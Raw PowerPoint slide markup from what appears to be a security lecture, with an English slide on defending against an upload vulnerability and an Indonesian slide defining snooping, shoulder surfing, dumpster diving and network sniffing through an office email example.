              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fix the vulnerability so this doesn't happen in the first place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encode or encrypt the uploaded files so that they aren't directly executable in this fashion. (Defense-in-depth.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4120554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b="1" dirty="0"/>
              <a:t>Snooping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> snooping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> eavesdropping, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yakni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: shoulder surfing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pengamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> display monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), dumpster diving (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), digital sniffing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pengamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengungkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sniffing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>penyadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dikantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> gateway internet), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sampai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diinbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>itulah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aktifitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SNIFFING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Oleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sebelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aktifitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SNIFFING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dicapture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
